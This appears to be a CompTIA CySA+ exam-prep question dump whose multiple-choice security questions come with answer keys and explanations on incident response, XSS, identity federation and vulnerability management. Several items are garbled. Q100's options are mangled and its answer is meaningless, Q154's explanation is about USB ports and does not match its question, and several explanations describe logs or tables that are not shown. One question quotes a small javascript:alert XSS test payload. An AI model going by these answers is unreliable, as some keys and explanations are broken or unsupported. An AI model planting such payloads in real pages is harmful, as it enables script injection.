A. It provides analytical pivoting and identifies knowledge gaps.
B. It guarantees that the discovered vulnerability will not be exploited again in the future.
C. It provides concise evidence that can be used in court
D. It allows for proactive detection and analysis of attack events

Answer: A

Explanation: 
 The Diamond Model of Intrusion Analysis is a framework that helps analysts to understand the relationships between the adversary, the victim, the infrastructure,
and the capability involved in an attack. It also enables analytical pivoting, which is the process of moving from one piece of information to another related one, and
identifies knowledge gaps that need further investigation.

NEW QUESTION 76
A security analyst found the following vulnerability on the company’s website:
<INPUT TYPE=“IMAGE” SRC=“javascript:alert(‘test’);”>
Which of the following should be implemented to prevent this type of attack in the future?

A. Input sanitization
B. Output encoding
C. Code obfuscation
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D. Prepared statements

Answer: A

Explanation: 
This is a type of web application vulnerability called cross-site scripting (XSS), which allows an attacker to inject malicious code into a web page that is viewed by
other users. XSS can be used to steal cookies, session tokens, credentials, or other sensitive information, or to perform actions on behalf of the victim.
Input sanitization is a technique that prevents XSS attacks by checking and filtering the user input before processing it. Input sanitization can remove or encode
any characters or strings that may be interpreted as code by the browser, such as <, >, ", ', or javascript:. Input sanitization can also validate the input against a
predefined format or range of values, and reject any input that does not match.
Output encoding is a technique that prevents XSS attacks by encoding the output before sending it to the browser. Output encoding can convert any characters or
strings that may be interpreted as code by the browser into harmless entities, such as <, >, ", ', or javascript:. Output encoding can also escape any special
characters that may have a different meaning in different contexts, such as , /, or ;.
Code obfuscation is a technique that makes the source code of a web application more difficult to read and understand by humans. Code obfuscation can use
techniques such as renaming variables and functions, removing comments and whitespace, replacing literals with expressions, or adding dummy code. Code
obfuscation can help protect the intellectual property and trade secrets of a web application, but it does not prevent XSS attacks.

NEW QUESTION 80
Which of the following does "federation" most likely refer to within the context of identity and access management?

A. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access
B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains
C. Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user
D. Correlating one's identity with the attributes and associated applications the user has access to

Answer: B

Explanation: 
 Federation is a system of trust between two parties for the purpose of authenticating users and conveying information needed to authorize their access to
resources. By using federation, a user can use one set of credentials to access multiple domains that trust each other.

NEW QUESTION 84
After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high.
The CISO refused the software request. Which of the following risk management principles did the CISO select?

A. Avoid
B. Transfer
C. Accept
D. Mitigate

Answer: A

Explanation: 
 Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or
unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO
decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management.

NEW QUESTION 85
A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization's environment. An analyst views the details of these
events below:

Which of the following statements best describes the intent of the attacker, based on this one-liner?

A. Attacker is escalating privileges via JavaScript.
B. Attacker is utilizing custom malware to download an additional script.
C. Attacker is executing PowerShell script "AccessToken.psr.
D. Attacker is attempting to install persistence mechanisms on the target machine.

Answer: B

Explanation: 
 The one-liner script is utilizing JavaScript to execute a PowerShell command that downloads and runs a script from an external source, indicating the use of
custom malware to download an additional script. ReferencesC: ompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and
Monitoring, page 156.

NEW QUESTION 90
Which of the following would eliminate the need for different passwords for a variety or internal application?

A. CASB
B. SSO
C. PAM
D. MFA

Answer: B
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Explanation: 
 Single Sign-On (SSO) allows users to log in with a single ID and password to access multiple applications. It eliminates the need for different passwords for
various internal applications, streamlining the authentication process.

NEW QUESTION 93
An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of
the following should the CSIRT conduct next?

A. Take a snapshot of the compromised server and verify its integrity
B. Restore the affected server to remove any malware
C. Contact the appropriate government agency to investigate
D. Research the malware strain to perform attribution

Answer: A

Explanation: 
 The next action that the CSIRT should conduct after isolating the compromised server from the network is to take a snapshot of the compromised server and
verify its integrity. Taking a snapshot of the compromised server involves creating an exact copy or image of the server’s data and state at a specific point in time.
Verifying its integrity involves ensuring that the snapshot has not been altered, corrupted, or tampered with during or after its creation. Taking a snapshot and
verifying its integrity can help preserve and protect any evidence or information related to the incident, as well as prevent any tampering, contamination, or
destruction of evidence.

NEW QUESTION 96
A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

A. The host is not up or responding.
B. The host is running excessive cipher suites.
C. The host is allowing insecure cipher suites.
D. The Secure Shell port on this host is closed

Answer: C

Explanation: 
 The output shows the result of running the ssl-enum-ciphers script with Nmap, which is a tool that can scan web servers for supported SSL/TLS cipher suites.
Cipher suites are combinations of cryptographic algorithms that are used to establish secure communication between a client and a server. The output shows the
cipher suites that are supported by the server, along with a letter grade (A through F) indicating the strength of the connection. The output also shows the least
strength, which is the strength of the weakest cipher offered by the server. In this case, the least strength is F, which means that the server is allowing insecure
cipher suites that are vulnerable to attacks or have been deprecated. For example, the output shows that the server supports SSLv3, which is an outdated and
insecure protocol that is susceptible to the POODLE attack. The output also shows that the server supports RC4, which is a weak and broken stream cipher that
should not be used. Therefore, the best description of the output is that the host is allowing insecure cipher suites. The other descriptions are not accurate, as they
do not reflect what the output shows. The host is not up or responding is incorrect, as the output clearly shows that the host is up and responding to the scan. The
host is running excessive cipher suites is incorrect, as the output does not indicate how many cipher suites the host is running, only which ones it supports. The
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Secure Shell port on this host is closed is incorrect, as the output does not show anything about port 22, which is the default port for Secure Shell (SSH). The
output only shows information about port 443, which is the default port for HTTPS.

NEW QUESTION 100
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following
display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets
containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

A. Change the display filter to f c
B. acciv
C. pore
D. Change the display filter to tcg.port=20
E. Change the display filter to f cp-daca and follow the TCP streams
F. Navigate to the File menu and select FTP from the Export objects option

Answer: C

Explanation: 
 The best way to see the entire contents of the downloaded files in Wireshark is to change the display filter to ftp-data and follow the TCP streams. FTP-data is a
protocol that is used to transfer files between an FTP client and server using TCP port 20. By filtering for ftp-data packets and following the TCP streams, the
analyst can see the actual file data that was transferred during the FTP session

NEW QUESTION 105
During a recent site survey. an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect the
network while preserving evidence?

A. Run a packet sniffer to monitor traffic to and from the access point.
B. Connect to the access point and examine its log files.
C. Identify who is connected to the access point and attempt to find the attacker.
D. Disconnect the access point from the network

Answer: D

Explanation: 
 The correct answer is D. Disconnect the access point from the network.
A rogue access point is a wireless access point that has been installed on a network without the authorization or knowledge of the network administrator. A rogue
access point can pose a serious security risk, as it can allow unauthorized users to access the network, intercept network traffic, or launch attacks against the
network or its devices1234.
The first action that should be taken to protect the network while preserving evidence is to disconnect the rogue access point from the network. This will prevent
any further damage or compromise of the network by blocking the access point from communicating with other devices or users. Disconnecting the rogue access
point will also preserve its state and configuration, which can be useful for forensic analysis and investigation. Disconnecting the rogue access point can be done
physically by unplugging it from the network port or wirelessly by disabling its radio frequency5.
The other options are not the best actions to take first, as they may not protect the network or preserve evidence effectively.
Option A is not the best action to take first, as running a packet sniffer to monitor traffic to and from the access point may not stop the rogue access point from
causing harm to the network. A packet sniffer is a tool that captures and analyzes network packets, which are units of data that travel across a network. A packet
sniffer can be useful for identifying and troubleshooting network problems, but it may not be able to prevent or block malicious traffic from a rogue access point.
Moreover, running a packet sniffer may require additional time and resources, which could delay the response and mitigation of the incident5.
Option B is not the best action to take first, as connecting to the access point and examining its log files may not protect the network or preserve evidence.
Connecting to the access point may expose the analyst’s device or credentials to potential attacks or compromise by the rogue access point. Examining its log
files may provide some information about the origin and activity of the rogue access point, but it may also alter or delete some evidence that could be useful for
forensic analysis and investigation. Furthermore, connecting to the access point and examining its log files may not prevent or stop the rogue access point from
continuing to harm the network5.
Option C is not the best action to take first, as identifying who is connected to the access point and attempting to find the attacker may not protect the network or
preserve evidence. Identifying who is connected to the access point may require additional tools or techniques, such as scanning for wireless devices or analyzing
network traffic, which could take time and resources away from responding and mitigating the incident. Attempting to find the attacker may also be difficult or
impossible, as the attacker may use various methods to hide their identity or location, such as encryption, spoofing, or proxy servers. Moreover, identifying who is
connected to the access point and attempting to find the attacker may not prevent or stop the rogue access point from causing further damage or compromise to
the network5.
References:
? 1 CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives
? 2 Cybersecurity Analyst+ - CompTIA
? 3 CompTIA CySA+ CS0-002 Certification Study Guide
? 4 CertMaster Learn for CySA+ Training - CompTIA
? 5 How to Protect Against Rogue Access Points on Wi-Fi - Byos
? 6 Wireless Access Point Protection: 5 Steps to Find Rogue Wi-Fi Networks …
? 7 Rogue Access Point - Techopedia
? 8 Rogue access point - Wikipedia
? 9 What is a Rogue Access Point (Rogue AP)? - Contextual Security

NEW QUESTION 109
An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which
of the following is this an example of?

A. Passive network foot printing
B. OS fingerprinting
C. Service port identification
D. Application versioning

Answer: A
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Explanation: 
 Passive network foot printing is the best description of the example, as it reflects the technique of collecting information about a network or system by monitoring
or sniffing network traffic without sending any packets or interacting with the target. Foot printing is a term that refers to the process of gathering information about
a target network or system, such as its IP addresses, open ports, operating systems, services, or vulnerabilities. Foot printing can be done for legitimate purposes,
such as penetration testing or auditing, or for malicious purposes, such as reconnaissance or intelligence gathering. Foot printing can be classified into two types:
active and passive. Active foot printing involves sending packets or requests to the target and analyzing the responses, such as using tools like ping, traceroute, or
Nmap. Active foot printing can provide more accurate and detailed information, but it can also be detected by firewalls or intrusion detection systems (IDS).
Passive foot printing involves observing or capturing network traffic without sending any packets or requests to the target, such as using tools like tcpdump,
Wireshark, or Shodan. Passive foot printing can provide less information, but it can also avoid detection by firewalls or IDS. The example in the question shows
that the attacker has gained access to the syslog server on a LAN and reviewed the syslog entries to prioritize possible next targets. A syslog server is a server
that collects and stores log messages from various devices or applications on a network. A syslog entry is a record of an event or activity that occurred on a device
or application, such as an error, a warning, or an alert. By reviewing the syslog entries, the attacker can obtain information about the network or system, such as its
configuration, status, performance, or security issues. This is an example of passive network foot printing, as the attacker is not sending any packets or requests to
the target, but rather observing or capturing network traffic from the syslog server. The other options are not correct, as they describe different techniques or
concepts.
OS fingerprinting is a technique of identifying the operating system of a target by analyzing its responses to certain packets or requests, such as using tools like
Nmap or Xprobe2. OS fingerprinting can be done actively or passively, but it is not what the attacker is doing in the example. Service port identification is a
technique of identifying the services running on a target by scanning its open ports and analyzing its responses to certain packets or requests, such as using tools
like Nmap or Netcat. Service port identification can be done actively or passively, but it is not what the attacker is doing in the example. Application versioning is a
concept that refers to the process of assigning unique identifiers to different versions of an application, such as using numbers, letters, dates, or names.
Application versioning can help to track changes, updates, bugs, or features of an application, but it is not related to what the attacker is doing in the example.

NEW QUESTION 110
A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes
and unusual network traffic. Which of the following incident response steps should be performed next?

A. Preparation
B. Validation
C. Containment
D. Eradication

Answer: C

Explanation: 
 After detecting a compromised email server and unusual network traffic, the next step in incident response is containment, to prevent further damage or spread of
the compromise. ReferencesC: ompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5: Incident Response, page 197.

NEW QUESTION 114
A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to
be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst
suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

A. Deploy a WAF to the front of the application.
B. Replace the current MD5 with SHA-256.
C. Deploy an antivirus application on the hosting system.
D. Replace the MD5 with digital signatures.

Answer: B

Explanation: 
 The correct answer is B. Replace the current MD5 with SHA-256.
The vulnerability that the security analyst is able to exploit is a hash collision, which is a situation where two different files produce the same hash value. Hash
collisions can allow an attacker to bypass the integrity or authentication checks that rely on hash values, and submit malicious files to the system. The web
application uses MD5, which is a hashing algorithm that is known to be vulnerable to hash collisions. Therefore, the analyst should suggest replacing the current
MD5 with SHA-256, which is a more secure and collision- resistant hashing algorithm.
The other options are not the best suggestions to mitigate the vulnerability with the fewest changes to the current script and infrastructure. Deploying a WAF (web
application firewall) to the front of the application (A) may help protect the web application from some common attacks, but it may not prevent hash collisions or
detect malicious files. Deploying an antivirus application on the hosting system © may help scan and remove malicious files from the system, but it may not prevent
hash collisions or block malicious files from being submitted. Replacing the MD5 with digital signatures (D) may help verify the authenticity and integrity of the files,
but it may require significant changes to the current script and infrastructure, as digital signatures involve public-key cryptography and certificate authorities.

NEW QUESTION 119
Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

A. Develop a call tree to inform impacted users
B. Schedule a review with all teams to discuss what occurred
C. Create an executive summary to update company leadership
D. Review regulatory compliance with public relations for official notification

Answer: B

Explanation: 
 One of the best actions to take after the conclusion of a security incident to improve incident response in the future is to schedule a review with all teams to
discuss what occurred, what went well, what went wrong, and what can be improved. This review is also known as a lessons learned session or an after-action
report. The purpose of this review is to identify the root causes of the incident, evaluate the effectiveness of the incident response process, document any gaps or
weaknesses in the security controls, and recommend corrective actions or preventive measures for future incidents. Official References:
https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack/

NEW QUESTION 122
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Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the
general public, as a best practice? (Select two).

A. Law enforcement
B. Governance
C. Legal
D. Manager
E. Public relations
F. Human resources

Answer: CE

Explanation: 
An incident manager should work with the legal and public relations entities to ensure correct processes are adhered to when communicating incident reporting to
the general public, as a best practice. The legal entity can provide guidance on the legal implications and obligations of disclosing the incident, such as compliance
with data protection laws, contractual obligations, and liability issues. The public relations entity can help craft the appropriate message and tone for the public
communication, as well as manage the reputation and image of the organization in the aftermath of the incident. These two entities can help the incident manager
balance the need for transparency and accountability with the need for confidentiality and security12. References: Incident Communication Templates, Incident
Management: Processes, Best Practices & Tools - Atlassian

NEW QUESTION 127
A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log:

Which of the following is most likely occurring, based on the events in the log?

A. An adversary is attempting to find the shortest path of compromise.
B. An adversary is performing a vulnerability scan.
C. An adversary is escalating privileges.
D. An adversary is performing a password stuffing attack..

Answer: B

Explanation: 
Based on the events in the log, the most likely occurrence is that an adversary is performing a vulnerability scan. The log shows LDAP read operations and EDR
enumerating local groups, which are indicative of an adversary scanning the system to find vulnerabilities or sensitive information. The final entry shows SMB
connection attempts to multiple hosts from a single host, which could be a sign of network discovery or lateral movement. References: CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 161; Monitor logs from vulnerability scanners, Section: Reports on
Nessus vulnerability data.

NEW QUESTION 129
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the
risk to the organization. Which of the following solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement
B. Configure MFA with strict access
C. Deploy an API gateway
D. Enable SSO to the cloud applications

Answer: A

Explanation: 
 A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise by providing visibility and control over cloud
applications and services. A CASB can enable policy enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules,
encrypting sensitive data, and detecting anomalous user behavior.

NEW QUESTION 131
An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and
the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue?

A. The scanner is running without an agent installed.
B. The scanner is running in active mode.
C. The scanner is segmented improperly.
D. The scanner is configured with a scanning window.

Answer: B

Explanation: 
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The scanner is running in active mode, which is the cause of this issue. Active mode is a type of vulnerability scanning that sends probes or requests to the target
systems to test their responses and identify potential vulnerabilities. Active mode can provide more accurate and comprehensive results, but it can also cause
more network traffic, performance degradation, or system instability. In some cases, active mode can trigger denial-of-service (DoS) conditions or crash the target
systems, especially if they are not configured to handle the scanning requests or if they have underlying vulnerabilities that can be exploited by the scanner12.
Therefore, the analyst should use caution when performing active mode scanning, and avoid scanning business-critical or sensitive systems without proper
authorization and preparation3. References: Vulnerability Scanning for my Server - Spiceworks Community, Negative Impacts of Automated Vulnerability Scanners
and How … - Acunetix, Vulnerability Scanning Best Practices

NEW QUESTION 135
An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes
the threat actor attributed to the malicious activity?

A. Insider threat
B. Ransomware group
C. Nation-state
D. Organized crime

Answer: C

NEW QUESTION 138
An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228

Answer: D

Explanation: 
 The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed
in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities
include CVE-2019- 0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE- 2017-0145 (EternalRomance), which are all remote
code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high
risk to the system and should be patched as soon as possible.

NEW QUESTION 139
A company is implementing a vulnerability management program and moving from an on- premises environment to a hybrid IaaS cloud environment. Which of the
following implications should be considered on the new hybrid environment?
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A. The current scanners should be migrated to the cloud
B. Cloud-specific misconfigurations may not be detected by the current scanners
C. Existing vulnerability scanners cannot scan laaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud

Answer: B

Explanation: 
 Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration of cloud resources, such as storage buckets, databases,
virtual machines, or containers. Cloud-specific misconfigurations may not be detected by the current scanners that are designed for on-premises environments, as
they may not have the visibility or access to the cloud resources or the cloud provider’s APIs. Therefore, one of the implications that should be considered on the
new hybrid environment is that cloud- specific misconfigurations may not be detected by the current scanners.

NEW QUESTION 141
The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:

Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?

A. Vulnerability A
B. Vulnerability B
C. Vulnerability C
D. Vulnerability D

Answer: B

Explanation: 
Vulnerability B is the vulnerability that the analyst should be most concerned about, knowing that end users frequently click on malicious links sent via email.
Vulnerability B is a remote code execution vulnerability in Microsoft Outlook that allows an attacker to run arbitrary code on the target system by sending a
specially crafted email message. This vulnerability is very dangerous, as it does not require any user interaction or attachment opening to trigger the exploit. The
attacker only needs to send an email to the victim’s Outlook account, and the code will execute automatically when Outlook connects to the Exchange server. This
vulnerability has a high severity rating of 9.8 out of 10, and it affects all supported versions of Outlook. Therefore, the analyst should prioritize patching this
vulnerability as soon as possible to prevent potential compromise of the workstations.

NEW QUESTION 143
A security analyst observed the following activity from a privileged account:
. Accessing emails and sensitive information
. Audit logs being modified
. Abnormal log-in times
Which of the following best describes the observed activity?

A. Irregular peer-to-peer communication
B. Unauthorized privileges
C. Rogue devices on the network
D. Insider attack

Answer: D

Explanation: 
 The observed activity from a privileged account indicates an insider attack, which is when a trusted user or employee misuses their access rights to compromise
the security of the organization. Accessing emails and sensitive information, modifying audit logs, and logging in at abnormal times are all signs of malicious
behavior by a privileged user who may be trying to steal, tamper, or destroy data, or cover their tracks. An insider attack can cause significant damage to the
organization’s reputation, operations, and compliance12. References: The Privileged Identity Playbook Guides Management of Privileged User Accounts, How to
Track Privileged Users’ Activities in Active Directory

NEW QUESTION 144
Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas
of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department
employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff
members should take when they arrive?

A. Turn on all systems, scan for infection, and back up data to a USB storage device.
B. Identify and remove the software installed on the impacted systems in the department.
C. Explain that malware cannot truly be removed and then reimage the devices.
D. Log on to the impacted systems with an administrator account that has privileges to perform backups.
E. Segment the entire department from the network and review each computer offline.

Answer: E

Explanation: 
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Segmenting the entire department from the network and reviewing each computer offline is the first step the incident response staff members should take when
they arrive. This step can help contain the malware infection and prevent it from spreading to other systems or networks. Reviewing each computer offline can help
identify the source and scope of the infection, and determine the best course of action for recovery12. Turning on all systems, scanning for infection, and backing
up data to a USB storage device is a risky step, as it can activate the malware and cause further damage or data loss. It can also compromise the USB storage
device and any other system that connects to it. Identifying and removing the software installed on the impacted systems in the department is a possible step, but it
should be done after segmenting the department from the network and reviewing each computer offline. Explaining that malware cannot truly be removed and then
reimaging the devices is a drastic step, as it can result in data loss and downtime. It should be done only as a last resort, and after backing up the data and
verifying its integrity. Logging on to the impacted systems with an administrator account that has privileges to perform backups is a dangerous step, as it can
expose the administrator credentials and privileges to the malware, and allow it to escalate its access and capabilities34. References: Incident Response:
Processes, Best Practices & Tools - Atlassian, Incident Response Best Practices | SANS Institute, Malware Removal: How to Remove Malware from Your Device,
How to Remove Malware From Your PC | PCMag

NEW QUESTION 147
A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the
objective most accurately?

A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1} ').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }

Answer: C

Explanation: 
 The function that can be used on a shell script to identify anomalies on the network routing most accurately is:
function x() { info=(dig(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ’{print $1} ').origin.asn.cymru.com TXT +short) && echo “$1 | $info” }
This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse
DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system
number (ASN) and other information related to the IP address. The function then prints the IP address and the ASN information, which can help identify any routing
anomalies or inconsistencies

NEW QUESTION 151
An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any
impact to the business?

A. Perform a tabletop drill based on previously identified incident scenarios.
B. Simulate an incident by shutting down power to the primary data center.
C. Migrate active workloads from the primary data center to the secondary location.
D. Compare the current plan to lessons learned from previous incidents.

Answer: A

Explanation: 
 Performing a tabletop drill based on previously identified incident scenarios is the best way to test the changes to the BC and DR plans without any impact to the
business, as it is a low-cost and low-risk method of exercising the plans and identifying any gaps or issues. A tabletop drill is a type of BC/DR exercise that
involves gathering key personnel from different departments and roles and discussing how they would respond to a hypothetical incident scenario. A tabletop drill
does not involve any actual simulation or disruption of the systems or processes, but rather relies on verbal communication and documentation review. A tabletop
drill can help to ensure that everyone is familiar with the BC/DR plans, that the plans reflect the current state of the organization, and that the plans are consistent
and coordinated across different functions. The other options are not as suitable as performing a tabletop drill, as they involve more cost, risk, or impact to the
business. Simulating an incident by shutting down power to the primary data center is a type of BC/DR exercise that involves creating an actual disruption or
outage of a critical system or process, and observing how the organization responds and recovers. This type of exercise can provide a realistic assessment of the
BC/DR capabilities, but it can also cause significant impact to the business operations, customers, and reputation. Migrating active workloads from the primary
data center to the secondary location is a type of BC/DR exercise that involves switching over from one system or site to another, and verifying that the backup
system or site can support the normal operations. This type of exercise can help to validate the functionality and performance of the backup system or site, but it
can also incur high costs, complexity, and potential errors or failures. Comparing the current plan to lessons learned from previous incidents is a type of BC/DR
activity that involves reviewing past experiences and outcomes, and identifying best practices or improvement opportunities. This activity can help to update and
refine the BC/DR plans, but it does not test or validate them in a simulated or actual scenario

NEW QUESTION 154
A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to
minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

A. Deploy agents on all systems to perform the scans.
B. Deploy a central scanner and perform non-credentialed scans.
C. Deploy a cloud-based scanner and perform a network scan.
D. Deploy a scanner sensor on every segment and perform credentialed scans.

Answer: A

Explanation: 
USB ports are a common attack vector that can be used to deliver malware, steal data, or compromise systems. The first step to mitigate this vulnerability is to
check the configurations of the company assets and disable or restrict the USB ports if possible. This will prevent unauthorized devices from being connected and
reduce the attack surface. The other options are also important, but they are not the first priority in this scenario. References:
? CompTIA CySA+ CS0-003 Certification Study Guide, page 247
? What are Attack Vectors: Definition & Vulnerabilities, section “How to secure attack vectors”
? Are there any attack vectors for a printer connected through USB in a Windows environment?, answer by user “schroeder”

NEW QUESTION 155
An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing
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the OS that is approaching the end-of- life date. Which of the following best describes a security analyst's concern?

A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery
D. There are no compensating controls in place for the OS.

Answer: A

Explanation: 
 A security analyst’s concern is that any discovered vulnerabilities in the OS that is approaching the end-of-life date will not be remediated by the vendor, leaving
the system exposed to potential attacks. The other options are not directly related to the security analyst’s role or responsibility. Verified References: CompTIA
Cybersecurity Analyst (CySA+) Certification Exam Objectives, page 9, section 2.21

NEW QUESTION 156
Which of the following most accurately describes the Cyber Kill Chain methodology?

A. It is used to correlate events to ascertain the TTPs of an attacker.
B. It is used to ascertain lateral movements of an attacker, enabling the process to be stopped.
C. It provides a clear model of how an attacker generally operates during an intrusion andthe actions to take at each stage
D. It outlines a clear path for determining the relationships between the attacker, the technology used, and the target

Answer: C

Explanation: 
 The Cyber Kill Chain methodology provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage. It is
divided into seven stages: reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives. It helps network
defenders understand and prevent cyberattacks by identifying the attacker’s objectives and tactics. References: The Cyber Kill Chain: The Seven Steps of a
Cyberattack

NEW QUESTION 157
A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The
proxy is sitting in a rack and is not being
used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the
company follow with this proxy?

A. Leave the proxy as is.
B. Decomission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy

Answer: B

Explanation: 
 The best practice that the company should follow with this proxy is to decommission the proxy. Decommissioning the proxy involves removing or disposing of the
proxy from the rack and the network, as well as deleting or wiping any data or configuration on the proxy. Decommissioning the proxy can help eliminate the
vulnerability on the proxy, as well as reduce the attack surface, complexity, or cost of maintaining the network. Decommissioning the proxy can also free up space
or resources for other devices or systems that are in use or needed by the company.

NEW QUESTION 162
Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his
current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the
following would be the best action for the incident response team to recommend?

A. Isolate Joe's PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe's PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps

Answer: D

Explanation: 
 The best action for the incident response team to recommend in this scenario is to perform no action until HR or legal counsel advises on next steps. This action
can help avoid any potential legal or ethical issues, such as violating employee privacy rights, contractual obligations, or organizational policies. This action can
also help ensure that any evidence or information collected from the employee’s system or network is admissible and valid in case of any legal action or dispute.
The incident response team should consult with HR or legal counsel before taking any action that may affect the employee’s system or network.

NEW QUESTION 166
A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is
the best solution to secure the network?

A. Implement segmentation with ACLs.
B. Configure logging and monitoring to the SIEM.
C. Deploy MFA to cloud storage locations.
D. Roll out an IDS.

Answer: A

Explanation: 
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 Implementing segmentation with ACLs is the best solution to secure the network. Segmentation is the process of dividing a network into smaller subnetworks, or
segments, based on criteria such as function, location, or security level. Segmentation can help improve the network performance, scalability, and manageability,
as well as enhance the network security by isolating the sensitive or critical data and systems from the rest of the network. ACLs are Access Control Lists, which
are rules or policies that specify which users, devices, or applications can access a network segment or resource, and which actions they can perform. ACLs can
help enforce the principle of least privilege, and prevent unauthorized or malicious access to the network segments or resources12. Configuring logging and
monitoring to the SIEM, deploying MFA to cloud storage locations, and rolling out an IDS are all good security practices, but they are not the best solution to
secure the network. Logging and monitoring to the SIEM can help detect and analyze the network events and incidents, but they do not prevent them. MFA can
help authenticate the users who access the cloud storage locations, but it does not protect the network from attacks or breaches. IDS can help identify and alert
the network intrusions, but it does not block them34 . References: Network Segmentation: What It Is and How to Do It Right, What is an Access Control List
(ACL)? | IBM, What is SIEM? | Microsoft Security, What is Multifactor Authentication (MFA)? | Duo Security, [What is an Intrusion Detection System (IDS)? | IBM]

NEW QUESTION 169
......
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